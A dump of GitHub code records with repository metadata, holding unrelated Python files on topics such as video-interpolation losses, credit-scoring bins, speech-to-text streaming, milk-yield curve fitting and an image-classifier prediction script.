postprocess_output(gt[:,:3])\n\n\t\trow0_out = self.head(input)\n\t\trow1_out = self.neck_down01(row0_out)\n\t\trow2_out = self.neck_down12(row1_out)\n\n\t\trow0_out, row1_out, row2_out = self.body_down0(row0_out, row1_out, row2_out)\n\t\trow0_out, row1_out, row2_out = self.body_down1(row0_out, row1_out, row2_out)\n\t\trow0_out, row1_out, row2_out = self.body_up0(row0_out, row1_out, row2_out)\n\t\trow0_out, row1_out, row2_out = self.body_up1(row0_out, row1_out, row2_out)\n\t\tout, row1_out, row2_out = self.body_up2(row0_out, row1_out, row2_out)\n\n\t\tif not self.split_tail:\n\t\t\tif self.mode =='wing':\n\t\t\t\tout = self.seg_act(self.tail(out))\n\t\t\telif self.mode[-1] != 's':\n\t\t\t\tout = F.tanh(self.tail(out))\n\t\t\t\t# print(\"hhhh\")\n\t\t\telse:\n\t\t\t\tout = self.seg_act(self.tail(out))\n\t\t\t\t# print(torch.nonzero(out).size(0))\n\t\telse:\n\t\t\tassert self.mode=='xs2xs'\n\t\t\tout_seg =self.tail_seg(out)\n\t\t\tout = F.tanh(self.tail(out))\n\n\t\tl1_loss = None\n\t\tgdl_loss = None\n\t\tvgg_loss = None\n\t\tce_loss = None\n\t\tssim_loss = None\n\t\t\t\n\n\t\tif self.training:\n\t\t\t# if self.mode.split('2')[1] in ['x','xs'] or (not self.seg_id ):\n\t\t\tif self.mode[-1] == 'x':\n\t\t\t\tgdl_loss = self.GDLLoss(preprocess_norm(out), preprocess_norm(gt))\n\t\t\t\tl1_loss = self.L1Loss(preprocess_norm(out), preprocess_norm(gt))\n\t\t\t\tssim_loss = self.SSIMLoss(preprocess_norm(out), preprocess_norm(gt)).mean()\n\n\t\t\t\tpredict_feat = self.vgg_net(preprocess_norm(out))\n\t\t\t\ttrue_feat = self.vgg_net(preprocess_norm(gt))\n\t\t\t\tvgg_loss = self.VGGLoss(predict_feat, true_feat)\n\n\t\t\telif self.mode == 'wing' or self.mode.split('2')[1] == 's' :\n\t\t\t\t# gdl_loss = self.GDLLoss(out, gt)\n\t\t\t\t# l1_loss = self.L1Loss(out, gt)\n\t\t\t\tif not self.seg_id:\n\t\t\t\t\tce_loss = self.CELoss(out, torch.argmax(gt, dim=1))\n\t\t\t\telse:\n\t\t\t\t\tce_loss = self.CELoss(out, gt.squeeze(1).long())\n\t\t\t\t\t# gdl_loss = self.GDLLoss(out, gt)\n\t\t\t\t\t# l1_loss = self.L1Loss(out, gt)\n\t\t\t\tvgg_loss = None\n\t\t\telif self.mode == 'xs2xs': ####################### try here\n\t\t\t\t# if self.ce:\n\t\t\t\t# if self.seg_id:\n\t\t\t\t# gdl_loss = self.GDLLoss(out, gt[:,:3])\n\t\t\t\t# l1_loss = self.L1Loss(out, gt[:,:3])\n\t\t\t\t# ssim_loss = 1 - self.SSIMLoss(postprocess_output(out), postprocess_output(gt[:, :3])).mean()\n\t\t\t\tgdl_loss = self.GDLLoss(preprocess_norm(out), preprocess_norm(gt[:,:3]))\n\t\t\t\tl1_loss = self.L1Loss(preprocess_norm(out), preprocess_norm(gt[:,:3]))\n\t\t\t\tssim_loss = self.SSIMLoss(preprocess_norm(out), preprocess_norm(gt[:, :3])).mean()\n\t\t\t\tif not self.seg_id:\n\t\t\t\t\tce_loss = self.CELoss(out_seg, torch.argmax(gt[:, 3:], dim=1))\n\t\t\t\telse:\n\t\t\t\t\tce_loss = self.CELoss(out_seg, gt[:, 3:].squeeze(1).long())\n\t\t\t\t# else:\n\t\t\t\t# \tgdl_loss = self.GDLLoss(out, gt)\n\t\t\t\t# \tl1_loss = self.L1Loss(out, gt)\n\t\t\t\t# else:\n\t\t\t\t# gdl_loss = self.GDLLoss(torch.cat([out, out_seg], dim=1), gt)\n\t\t\t\t# l1_loss = self.L1Loss(torch.cat([out, out_seg], dim=1), gt)\n\t\t\t\tpredict_feat = self.vgg_net(preprocess_norm(out))\n\t\t\t\ttrue_feat = self.vgg_net(preprocess_norm(gt[:, :3]))\n\t\t\t\t\n\t\t\t\tvgg_loss = self.VGGLoss(predict_feat, true_feat)\n\t\t\t# \telse:\n\t\t\t# \t\tvgg_loss = None\n\t\t\t# else:\n\t\t\t# \tvgg_loss = None\n\n\t\t\t# if self.seg_id:\n\t\t\t# \tif self.mode.split('2')[1] == 's':\n\t\t\t# \t\tce_loss = self.celoss(out, gt)\n\t\t\t# \telse: # xs2xs\n\t\t\t# \t\tce_loss = self.celoss(out_seg, gt[:, 3].long())\n\t\t\t# else:\n\t\t\t# \tce_loss = None\n\n\t\tif self.mode == 'xs2xs' and self.split_tail:\n\t\t\tout_seg = self.seg_act(out_seg)\n\t\t\tout = torch.cat([out, out_seg], dim=1)\n\n\t\t\t### todo laplacian pyramid loss for image ###\n\n\t\treturn out, l1_loss, gdl_loss, vgg_loss, ce_loss, ssim_loss\n\n\n\n","repo_name":"lzhangbj/deep_video_interpolation_extrapolation","sub_path":"nets/grid_net.py","file_name":"grid_net.py","file_ext":"py","file_size_in_byte":12550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7820299227","text":"\nimport pandas as pd\nimport numpy as np\n\n'''分箱坏账率计算'''\ndef binbadrate(df, var, target, grantRateIndicator=0):\n '''\n :param df: 需要计算好坏比率的数据集\n :param var: 需要计算好坏比率的特征\n :param target: 好坏标签\n :param grantRateIndicator: 1返回总体的坏样本率,0不返回\n :return: 每箱的坏样本率,以及总体的坏样本率(当grantRateIndicator==1时)\n '''\n total = df.groupby([var])[target].count()\n total = pd.DataFrame({'total': total})\n bad = df.groupby([var])[target].sum()\n bad = pd.DataFrame({'bad': bad})\n regroup = total.merge(bad, left_index=True, right_index=True, how='left') #数据框左连接操作\n regroup.reset_index(level=0, inplace=True)\n regroup['bad_rate'] = regroup.apply(lambda x: x.bad * 1.0 / x.total, axis=1)\n dicts = dict(zip(regroup[var],regroup['bad_rate']))\n if grantRateIndicator==0:\n return (dicts, regroup)\n N = sum(regroup['total'])\n B = sum(regroup['bad'])\n overallRate = B * 1.0 / N\n return dicts, regroup, overallRate\n\n\n\n'''分箱单调性检验'''\n## determine whether the bad rate is monotone along the sortByVar\ndef monotone(df, sortByVar, target):\n '''\n :param df: the dataset contains the column which should be monotone with the bad rate and bad column\n :param sortByVar: the column which should be monotone with the bad rate\n :param target: the bad column\n :param special_attribute: some attributes should be excluded when checking monotone\n :return:\n '''\n notnull_df = df.loc[~df[sortByVar].isnull()] #排除数据为空的情况\n if len(set(notnull_df[sortByVar])) <= 2:\n return True\n regroup = binbadrate(notnull_df, sortByVar, target)[1] #这里是使用分箱坏账率计算函数\n combined = zip(regroup['total'],regroup['bad'])\n badRate = [x[1]*1.0/x[0] for x in combined]\n\n #数据单调性公式\n badRateMonotone = [(badRate[i]badRate[i+1] and badRate[i] < badRate[i-1]) for i in range(1,len(badRate)-1)]\n\n Monotone = len(set(badRateMonotone))\n if Monotone == 1 and list(set(badRateMonotone))[0]==True:\n return True\n else:\n return False\n\n\n\n'''空值检测,如果数据中空值超过一半或变量只有一个取值时,返回数据不可用'''\ndef check_nullvalue(dataframe):\n '''\n :param dataframe: 目标数据框\n :return: 不能用的变量列表\n '''\n column=list(dataframe.columns)\n\n use_list = []\n unuse_list = []\n for key in column:\n if dataframe[dataframe[key].isnull()].shape[0] typing.Mapping[str, Type[\"ProcessingModule\"]]:\n\n from dharpa.processing.processing_module import ProcessingModule\n from dharpa.workflows import workflow # noqa\n\n if not modules_to_load:\n modules_to_load = DEFAULT_MODULES_TO_LOAD\n\n all_module_clases = get_subclass_map(\n ProcessingModule,\n preload_modules=modules_to_load,\n key_func=get_module_name_from_class,\n override_duplicate_class=True,\n )\n return all_module_clases\n\n\ndef find_workflow_descriptions(\n path: Union[str, Path], exclude_dirs: typing.Iterable[str] = DEFAULT_EXCLUDE_DIRS\n) -> typing.Dict[str, typing.Mapping[str, typing.Any]]:\n\n if isinstance(path, str):\n path = Path(os.path.expanduser(path))\n\n result: typing.Dict[str, typing.Mapping[str, typing.Any]] = {}\n for root, dirnames, filenames in os.walk(path, topdown=True):\n\n if exclude_dirs:\n dirnames[:] = [d for d in dirnames if d not in exclude_dirs]\n\n for filename in [\n f\n for f in filenames\n if os.path.isfile(os.path.join(root, f))\n and any(f.endswith(ext) for ext in VALID_WORKFLOW_FILE_EXTENSIONS)\n ]:\n\n path = os.path.join(root, filename)\n data = get_data_from_file(path)\n\n name = data.get(MODULE_TYPE_NAME_KEY, None)\n if name is None:\n name = filename.split(\".\", maxsplit=1)[0]\n\n if name in result.keys():\n raise Exception(f\"Duplicate workflow name: {name}\")\n result[name] = {\"data\": data, \"path\": path}\n\n return result\n\n\ndef generate_workflow_processing_class_from_config(\n module_name: str, config: \"ProcessingConfig\"\n) -> typing.Type[\"WorkflowProcessingModule\"]:\n\n _workflow_config = config.dict()[\"module_config\"]\n\n def init(self, **m_config: typing.Any):\n m_config.update(_workflow_config)\n m_config.setdefault(\"meta\", {}).update(config.meta)\n\n if not m_config.get(\"workflow_id\", None):\n m_config[\"workflow_id\"] = config.module_type\n\n super(self.__class__, self).__init__(**m_config)\n\n from dharpa.models import WorkflowProcessingModuleConfigDynamic\n from dharpa.workflows.workflow import WorkflowProcessingModule\n\n attrs = {\n \"__init__\": init,\n \"_processing_step_config_cls\": WorkflowProcessingModuleConfigDynamic,\n \"_module_name\": module_name,\n }\n d = config.meta.get(\"doc\", None)\n if d:\n attrs[\"__doc__\"] = d\n\n cls = type(\n f\"Workflow{to_camel_case(module_name, capitalize=True)}\",\n (WorkflowProcessingModule,),\n attrs,\n )\n return cls\n\n\ndef create_workflow_modules(\n *configs: typing.Union[\"WorkflowModule\", typing.Mapping],\n workflow_id: str = None,\n force_mappings: bool = True,\n) -> typing.List[\"WorkflowModule\"]:\n\n from dharpa.models import ProcessingConfig\n from dharpa.workflows.modules import WorkflowModule\n from dharpa.workflows.workflow import DharpaWorkflow\n\n result = []\n module_ids: typing.Set[str] = set()\n\n for c in configs:\n\n if isinstance(c, WorkflowModule):\n if force_mappings:\n raise TypeError(\n \"Using WorkflowModule classes not allowed in config (in this case).\"\n )\n if c.workflow_id != workflow_id:\n raise ValueError(\n f\"Invalid workflow id '{c.workflow_id}' for module '{c.alias}': must match '{workflow_id}'\"\n )\n m = c\n elif isinstance(c, typing.Mapping):\n\n _c = dict(c)\n m_id = _c.pop(\"module_alias\", None)\n input_links = _c.pop(\"input_links\", None)\n processing_config = ProcessingConfig.from_dict(**_c)\n\n if m_id is None:\n m_id = processing_config.module_type\n\n if not workflow_id:\n workflow_id = m_id\n\n if processing_config.is_pipeline:\n m = DharpaWorkflow(\n alias=m_id,\n workflow_id=workflow_id,\n processing_config=processing_config,\n input_links=input_links,\n )\n else:\n m = WorkflowModule(\n alias=m_id,\n workflow_id=workflow_id,\n processing_config=processing_config,\n input_links=input_links,\n )\n # m = WorkflowModule.from_dict(**c)\n else:\n raise TypeError(\n f\"Can't create workflow modules, invalid type for module: '{type(c)}'\"\n )\n\n if m.alias in module_ids:\n raise ValueError(\n f\"Can't parse module configs: duplicate module ids: {m.alias}\"\n )\n module_ids.add(m.alias)\n result.append(m)\n\n return result\n\n\n_AUTO_MODULE_ID: typing.Dict[str, int] = {}\n\n\ndef get_auto_module_alias(\n module_cls: typing.Union[typing.Type, str], use_incremental_ids: bool = False\n) -> str:\n \"\"\"Return an id for a module obj of a provided module class.\n\n If 'use_incremental_ids' is set to True, a unique id is returned.\n\n Args:\n module_cls (Type): the module class (inherits from DharpaModule)\n use_incremental_ids (bool): whether to return a unique (incremental) id\n\n Returns:\n str: a module id\n \"\"\"\n\n if isinstance(module_cls, str):\n name = module_cls\n else:\n name = get_module_name_from_class(module_cls)\n if not use_incremental_ids:\n return name\n\n nr = _AUTO_MODULE_ID.setdefault(name, 0)\n _AUTO_MODULE_ID[name] = nr + 1\n\n return f\"{name}_{nr}\"\n","repo_name":"DHARPA-Project/dharpa-toolbox","sub_path":"src/dharpa/workflows/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35840851002","text":"'''\nstart 20220308\nend\n'''\n\nimport sys\n\nwhile True:\n case = list(map(int,sys.stdin.readline().split()))\n if case == [0]:\n break\n n = case[0]\n l = case[1:]\n stack_val = []\n stack_idx = []\n stack_back = []\n m = 0\n for idx, val in enumerate(l):\n b = 0\n while stack_val and stack_val[-1] > val:\n tmp1 = stack_val.pop()\n tmp2 = stack_idx.pop()\n tmp3 = stack_back.pop()\n m = max(m,tmp1*(idx-tmp2+tmp3))\n b+=(tmp3+1)\n stack_val.append(val)\n stack_idx.append(idx)\n stack_back.append(b)\n for idx, val in enumerate(stack_val):\n tmp = (n-stack_idx[idx]+stack_back[idx])*val\n m = max(m,tmp)\n print(m)","repo_name":"99taeha/Baekjun","sub_path":"p/6549.py","file_name":"6549.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"7119527326","text":"import asyncio\nimport json\nimport logging\nimport time\nfrom io import DEFAULT_BUFFER_SIZE\nimport pyaudio\nimport requests\n\nimport websockets\nfrom keys import get_client_data\nfrom requests import Session\n\nAPI_BASE = \"https://openapi.vito.ai\"\n\nSAMPLE_RATE = 8000\nRECORD_SECONDS =30\nCHUNK = 1024\nCHANNELS = 1\n\np = pyaudio.PyAudio()\n\nclass Client :\n def __init__(self, client_data) :\n super().__init__()\n self.logger = logging.getLogger(__name__)\n self.client_data = client_data\n self._sess = Session()\n self._token = None\n\n @property\n def token(self) :\n if self._token is None or self._token[\"expire_at\"] < time.time() :\n resp = self._sess.post(\n API_BASE + \"/v1/authenticate\",\n data = self.client_data\n )\n\n resp.raise_for_status()\n self._token = resp.json()\n print(self._token)\n return self._token[\"access_token\"]\n\n async def streaming_transcribe(self, filename, config=None) :\n if config is None:\n config = dict(sample_rate = str(SAMPLE_RATE), encoding = \"LINEAR16\", use_itn = \"true\", use_disfluency_filter = \"true\", use_profanity_filter = \"false\")\n\n stream = p.open(\n format=pyaudio.paInt16,\n channels=CHANNELS,\n rate=SAMPLE_RATE,\n input=True,\n output=True,\n frames_per_buffer=CHUNK\n )\n\n STREAMING_ENDPOINT = \"wss://{}/v1/transcribe:streaming?{}\".format(\n API_BASE.split(\"//\")[1], \"&\".join(map(\"=\".join, config.items()))\n )\n\n print(STREAMING_ENDPOINT)\n\n conn_kwargs = dict(extra_headers={\"Authorization\" : \"bearer \" + self.token})\n\n async def streamer(websocket) :\n for i in range(0, int(SAMPLE_RATE / CHUNK * RECORD_SECONDS)) :\n buff = stream.read(CHUNK)\n if buff is None or len(buff) == 0 :\n break\n await websocket.send(buff)\n await websocket.send(\"EOS\")\n\n async def transcriber(websocket) :\n async for msg in websocket :\n msg = json.loads(msg)\n if msg[\"final\"] :\n print(\"final ended with \" + msg[\"alternatives\"][0][\"text\"])\n\n async with websockets.connect(STREAMING_ENDPOINT, **conn_kwargs) as websocket :\n await asyncio.gather(\n streamer(websocket),\n transcriber(websocket),\n )\n\nif __name__ == \"__main__\" :\n client_data = get_client_data()\n client = Client(client_data)\n\n fname = \"../data/test.wav\"\n asyncio.run(client.streaming_transcribe(fname))\n","repo_name":"SWMTeamCuriosity/mic_input_test","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12413181093","text":"i = int(input(\"Enter a new number\"))\n\nwhile (i<=40):\n i = int(input(\"Enter a second new number\"))\n print(i)\nprint(\"Done with the loop\") ## this print will occur once the condition gets false\n\n## in the while loop it doesnot stop untill it gets false as per the given condition\n\nj = int(input(\"Enter a number for the loop\"))\nwhile(j>10):\n print(j)\n j=j-2\nelse: \n print(\"After the 'while' condition is over I am inside else\")","repo_name":"HELINCON/python_tutorial_udemy","sub_path":"basic/while_loop.py","file_name":"while_loop.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30201610404","text":"\"\"\"add_restoration_approval_type_registrar_dates\n\nRevision ID: 89fe33f436c1\nRevises: 08da65c4a94a\nCreate Date: 2023-03-29 15:10:24.319173\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '89fe33f436c1'\ndown_revision = '08da65c4a94a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('filings', sa.Column('application_date', sa.DateTime(timezone=True), nullable=True))\n op.add_column('filings', sa.Column('notice_date', sa.DateTime(timezone=True), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('filings', 'application_date')\n op.drop_column('filings', 'notice_date')\n # ### end Alembic commands ###\n","repo_name":"bcgov/lear","sub_path":"legal-api/migrations/versions/89fe33f436c1_add_restoration_approval_type_registrar_.py","file_name":"89fe33f436c1_add_restoration_approval_type_registrar_.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"18476239200","text":"import sys\n\n# Patch missing sys.argv[0] which is None for some reason when using PyOxidizer\n# Kivy fails on importing the library, because it tries to iterate on sys.argv[0]\nif sys.argv[0] is None:\n sys.argv[0] = sys.executable\n print(f\"Patched sys.argv to {sys.argv}\")\n\nimport kivy\nfrom kivy.app import App\nfrom kivy.uix.label import Label\n\n\nclass MyFirstKivyApp(App):\n def build(self):\n return Label(text=\"Hello World !\")\n\n\ndef main() -> None:\n kivy.require(\"2.0.0\")\n MyFirstKivyApp().run()\n\n\nif __name__ == \"__main__\":\n print(\"Launching HelloKivy from __main__\")\n main()\n","repo_name":"sureshjoshi/pants-plugins","sub_path":"examples/python/hellokivy/hellokivy/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"26186640141","text":"# Imports here\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\nfrom collections import OrderedDict\nfrom PIL import Image\nimport numpy as np\nimport seaborn as sns\nimport argparse\nimport json\n\n\n\n#arguments image prediction\nparser = argparse.ArgumentParser(description='Image classifier prediction directory')\n\nparser.add_argument('image_dir', help='image path directory', type=str)\nparser.add_argument('check_dir', help='checkpoint directory', type=str)\nparser.add_argument('--topk', help='top K most likely classes', type=int)\nparser.add_argument('--category_names', help='mapping of categories to real names', type=str)\nparser.add_argument('--gpu', help='turn on the GPU', type=str)\n\nresults = parser.parse_args()\n\n#Model loading function\ndef load_checkpoint(filepath):\n checkpoint = torch.load(filepath)\n \n #Checkpoint\n if checkpoint['arch'] == 'vgg13':\n model = models.vgg13(pretrained=True)\n else:\n model = models.vgg16(pretrained=True) \n\n #Freezing our fetures grediance \n for param in model.parameters():\n param.requires_grad = False\n \n #from checkpoint \n model.classifier = checkpoint['classifier']\n model.load_state_dict(checkpoint['state_dict'])\n model.class_to_idx = checkpoint['class_to_idx']\n \n return model\n\n# Scales, crops, and normalizes a PIL image for a PyTorch model returns an Numpy array\ndef process_image(image):\n #Open the image\n check_image = Image.open(image)\n \n #Check the image size\n orig_width, orig_height = check_image.size\n\n #Change the size in the aspect ratio\n if orig_width < orig_height:\n change_size=[256, 256**600]\n else:\n change_size=[256**600, 256]\n \n check_image.thumbnail(size = change_size)\n \n #crop the image accordingly \n center = orig_width/4, orig_height/4\n\n left = center[0]-(224/2)\n upper = center[1]-(224/2)\n right = center[0]+(224/2)\n lower = center[1]+(224/2)\n \n check_image = check_image.crop((left, upper, right, lower))\n \n #Color channels as floats\n np_image = np.array(check_image)/255\n \n #Image normaliation\n norm_means = [0.485, 0.456, 0.406]\n norm_sd = [0.229, 0.224, 0.225]\n \n np_image = (np_image-norm_means)/norm_sd\n \n #Color channel as first dimension\n np_image = np_image.transpose(2, 0, 1)\n \n return np_image\n\ndef predict(image_path, model, topk, device):\n \n if device == 'cuda':\n model.to('cuda')\n else:\n model.to('cpu')\n \n torch_image = torch.from_numpy(np.expand_dims(process_image(image_path), axis=0)).type(torch.FloatTensor)\n \n logps = model.forward(torch_image)\n linps = torch.exp(logps)\n \n top_probs, top_labels = linps.topk(topk)\n top_probs = top_probs.cpu()\n top_labels = top_labels.cpu()\n top_probs = top_probs.tolist()[0]\n top_labels = top_labels.tolist()[0]\n \n class_to_idx = {val: key for key, val in model.class_to_idx.items()}\n classes = [class_to_idx[item] for item in top_labels]\n classes = np.array(classes) \n \n return top_probs, top_labels, classes\n\n#File path argument\nfile_path = results.image_dir\n\n#GPU if provided\nif results.gpu == 'gpu':\n device = 'cuda'\nelse:\n device = 'cpu'\n\n#Category name if provided, else, take the defult\nif results.category_names:\n with open(results.category_names, 'r') as f:\n cat_to_name = json.load(f)\nelse:\n with open('cat_to_name.json', 'r') as f:\n cat_to_name = json.load(f)\n pass\n\n#Loading the model from the checkpoint\nmodel = load_checkpoint(results.check_dir)\n\n#Number of TOP_K \nif results.topk:\n top_k = results.topk\nelse:\n top_k = 5\n\n#Call the predict fuction and make predictions\ntop_probs, top_labels, classes = predict(file_path, model, top_k, device)\n\n\n#Taking the class names from the classes\nclass_names = [cat_to_name [item] for item in classes]\n\n#Print the results\nfor cl in range(len(class_names)):\n print(\"Probability level: {}/{} \".format(cl+1, top_k),\n \"Class name: {} \".format(class_names [cl]),\n \"Probability: {:.3f}% \".format(top_probs [cl]*100),\n )\n","repo_name":"Natialuk/Image-classifier","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1055928387","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nfrom scipy.optimize import curve_fit\nfrom milkbot.formulas import ecm_milk, milkbot_\n\ndf = pd.read_csv(\"docs/example1.csv\")\n\n# Plot Pct Fat / Protein v DIM\nX = df['DIM'].values.reshape(-1,1)\nregf = LinearRegression().fit(X[1:], df['PCTF'].iloc[1:].values)\nregp = LinearRegression().fit(X[1:], df['PCTP'].iloc[1:].values)\ndf['PCTF_EST'] = regf.predict(X)\ndf['PCTP_EST'] = regp.predict(X)\nplt.plot(df['DIM'],df['PCTF'],'ro',label=\"PCTF\")\nplt.plot(df['DIM'],df['PCTF_EST'],'r--',label=\"PCTF_EST\")\nplt.plot(df['DIM'],df['PCTP'],'go',label=\"PCTP\")\nplt.plot(df['DIM'],df['PCTP_EST'],'g--',label=\"PCTP_EST\")\nplt.legend()\nplt.grid()\nplt.savefig('docs/pctf_pctp_by_dim.png', bbox_inches='tight')\nplt.close()\n\n# Plot MILK v DIM\ndim = np.arange(df['DIM'].max())\nsoln, _ = curve_fit(milkbot_, df.DIM, df.MILK, p0=np.array([85.0, 50, -90, 0.0009]))\nmilk_est = milkbot_(dim, *soln)\nplt.plot(df['DIM'],df['MILK'],'ro')\nplt.plot(dim,milk_est,'b-')\nplt.grid()\nplt.savefig('docs/milk_by_dim.png', bbox_inches='tight')\nplt.close()\n\n# Plot ECM v DIM\ndf['ECM_RAW'] = df.apply(lambda x: ecm_milk(x.MILK, x.PCTF, x.PCTP), axis=1)\necm_raw_soln, _ = curve_fit(milkbot_, df.DIM, df.ECM_RAW, \n p0=np.array([df['ECM_RAW'].max(), 50, -90, 0.0009]))\necm_raw_est = milkbot_(dim, *ecm_raw_soln)\ndf['ECM'] = df.apply(lambda x: ecm_milk(x.MILK, x.PCTF_EST, x.PCTP_EST), axis=1)\necm_soln, _ = curve_fit(milkbot_, df.DIM, df.ECM, p0=np.array([df['ECM'].max(), 50, -90, 0.0009]))\necm_est = milkbot_(dim, *ecm_soln)\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(8, 4), sharey=True)\nax1.plot(df['DIM'],df['ECM_RAW'],'ko',label='ECM_RAW')\nax2.plot(df['DIM'],df['ECM'],'bo',label='ECM')\nax1.plot(dim,ecm_raw_est,'k:',label='ECM_RAW_EST')\nax2.plot(dim,ecm_est,'b:',label='ECM_EST')\nax1.legend()\nax2.legend()\nax1.grid()\nax2.grid()\nfig.suptitle('ECM Estimation: Raw v Using Estimated % Fat and % Protein')\nplt.savefig('docs/ecm_raw_by_dim.png', bbox_inches='tight')\nplt.close()\n\n","repo_name":"YanniPapadakis-Zoetis/ECM_Milkbot","sub_path":"ecm_estimation.py","file_name":"ecm_estimation.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24210294370","text":"import cv2\nimport numpy as np\nimport pytest\nfrom PIL import Image, ImageDraw, ImageFont\n\nfrom piqa.image_processing import detect_paragraphs\n\ndef create_test_image(text: str, width: int, height: int, font_size: int, filename: str) -> None:\n image = Image.new('RGB', (width, height), color=(255, 255, 255))\n font = ImageFont.load_default()\n draw = ImageDraw.Draw(image)\n draw.text((10, 10), text, font=font, fill=(0, 0, 0))\n image.save(f\"tests/data/images/{filename}\")\n\ndef generate_test_images() -> None:\n print(\"CREATING TEST IMAGES\")\n text_single_paragraph = \"This is a single paragraph. It has multiple lines and sentences, but it is still a single paragraph.\"\n text_two_paragraphs = \"This is the first paragraph.\\n\\nThis is the second paragraph.\"\n text_paragraphs_with_space = \"Paragraph 1\\n\\nParagraph 2\\n\\nParagraph 3\"\n\n create_test_image(text_single_paragraph, 300, 100, 16, \"single_paragraph.png\")\n create_test_image(text_two_paragraphs, 300, 150, 16, \"two_paragraphs.png\")\n create_test_image(text_paragraphs_with_space, 300, 200, 16, \"paragraphs_with_space.png\")\n\n# Temporarily disabled; This feature is to be built in the future\n\n# def test_detect_paragraphs_empty_image() -> None:\n# empty_image = np.zeros((100, 100), dtype=np.uint8)\n# cv2.imwrite(\"data/images/empty_image.png\", empty_image)\n\n# thresh, dilate, image = detect_paragraphs(\"data/images/empty_image.png\")\n\n# assert np.array_equal(thresh, empty_image)\n# assert np.array_equal(dilate, empty_image)\n# assert np.array_equal(image, cv2.cvtColor(empty_image, cv2.COLOR_GRAY2BGR))\n\n# def test_detect_paragraphs_no_text_image() -> None:\n# no_text_image = np.ones((100, 100), dtype=np.uint8) * 255\n# cv2.imwrite(\"data/images/no_text_image.png\", no_text_image)\n\n# thresh, dilate, image = detect_paragraphs(\"data/images/no_text_image.png\")\n\n# assert np.array_equal(thresh, no_text_image)\n# assert np.array_equal(dilate, no_text_image)\n# assert np.array_equal(image, cv2.cvtColor(no_text_image, cv2.COLOR_GRAY2BGR))\n\n# def test_detect_paragraphs_invalid_path() -> None:\n# with pytest.raises(cv2.error):\n# detect_paragraphs(\"invalid_path.png\")\n\n# def test_detect_paragraphs_single_paragraph() -> None:\n# single_paragraph = cv2.imread(\"data/images/single_paragraph.png\")\n\n# _, _, _, rectangles = detect_paragraphs(\"data/images/single_paragraph.png\")\n\n# assert len(rectangles) == 1\n\n# def test_detect_paragraphs_two_paragraphs() -> None:\n# two_paragraphs = cv2.imread(\"data/images/two_paragraphs.png\")\n\n# _, _, _, rectangles = detect_paragraphs(\"data/images/two_paragraphs.png\")\n\n# assert len(rectangles) == 2\n\n# def test_detect_paragraphs_paragraphs_with_space() -> None:\n# paragraphs_with_space = cv2.imread(\"data/images/paragraphs_with_space.png\")\n\n# _, _, _, rectangles = detect_paragraphs(\"data/images/paragraphs_with_space.png\")\n\n# assert len(rectangles) == 3\n","repo_name":"vliegenthart/PiQA","sub_path":"tests/image_processing/test_image_operations.py","file_name":"test_image_operations.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"73872362384","text":"from Mips_table import *\n\narq = input(\"Digite o nome do arquivo: \")\nfile = open(arq, 'r')\nprint('')\nfor cmd in file:\n cmd = cmd.replace('\\n','')\n inst, regs = split_cmd(cmd)\n reg_tipe= code_order(inst)\n code = code_inst(inst)\n print(cmd)\n i=0\n for reg in regs:\n code = replace_code(code, reg_tipe[i], code_reg(reg))\n i+=1\n print(code)\n print(bin_to_hex(code))\ninput(\"\\n========================\\nPressione enter pra sair\")\n","repo_name":"Citeli-py/Mips-Converter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"871523434","text":"from auxiliary.io_utility import IOUtility\n\n\nclass SignalProcessorUtility(IOUtility):\n\n def __init__(self, data=None):\n super().__init__(data)\n self.data = data\n\n def read(self):\n \"\"\"\n Incorporate all signals into a single list\n :return:\n \"\"\"\n integrated_signals = []\n for antennas, content in self.data.items():\n for index, signals in content.items():\n integrated_signals.append(\n signals\n )\n return integrated_signals\n\n def pack(self, filtered_signals):\n \"\"\"\n Pack processed result with the formal dictionary by the feature of the ordered list\n :param filtered_signals:\n :return:\n \"\"\"\n i = 0\n for antennas, content in self.data.items():\n for index, signals in content.items():\n self.data[antennas][index] = filtered_signals[i]\n i += 1\n return self.data\n","repo_name":"qiwliu/heart_rate_analyzer","sub_path":"src/auxiliary/signal_processor_utility.py","file_name":"signal_processor_utility.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9886165501","text":"import re\nimport pathlib\nimport ifcopenshell\nimport 